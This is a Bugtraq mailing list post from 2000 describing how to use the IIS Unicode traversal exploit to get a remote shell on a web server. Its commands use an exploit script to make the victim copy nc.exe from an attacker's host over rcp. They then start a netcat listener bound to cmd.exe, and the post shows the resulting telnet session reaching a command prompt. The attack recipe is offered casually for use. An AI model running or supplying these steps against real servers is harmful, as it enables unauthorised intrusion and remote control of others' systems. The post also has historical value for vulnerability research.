Bugtraq mailing list archives

IIS Unicode

From: Roelof Temmingh <roelof () SENSEPOST COM>
Date: Wed, 25 Oct 2000 02:54:58 +0200

Bugtraq ID 1806,
http://www.securityfocus.com/vdb/bottom.html?vid=1806 applies:

I was having problems executing a command that contains a redirect (>) using
any of the IIS Unicode exploits (including my own exploits on security focus
;) ). If anyone can get a redirect working, please let me know. In order to get
some interesting tools on the victim, you would probably want to have the
victim to FTP to the attacker. Problem without redirect is that you cannot
build the FTP command file, and you are a bit stuck.

A workaround (example) (with a rsh running on attacker's host and the necessary
config in .rhosts):

perl unicodexecute.pl 160.124.19.101:80 'rcp -b 160.124.19.98.roelof:/tmp/nc.exe nc.exe'
perl unicodexecute.pl 160.124.19.101:80 'c:\inetpub\scripts\nc.exe -l -p 8888 -e cmd.exe'
telnet 160.124.19.101 8888

Trying 160.124.19.101...
Connected to clickfeed.
Escape character is '^]'.
Microsoft(R) Windows NT(TM)
(C) Copyright 1985-1996 Microsoft Corp.

C:\Inetpub\scripts>

Of course you need to allow port 514 to the inside of your net etc.

;)
Have fun,
Roelof.

PS: this is a bit of a rip off from www.hack.co.za - spawncmd.pl

------------------------------------------------------
Roelof W Temmingh               SensePost IT security
roelof () sensepost com         +27 83 448 6996
                http://www.sensepost.com

Current thread:

IIS Unicode Roelof Temmingh (Oct 25)
- Re: IIS Unicode Ryan Yagatich (Oct 26)
- <Possible follow-ups>
- Re: IIS Unicode Nsfocus Security Team (Oct 26)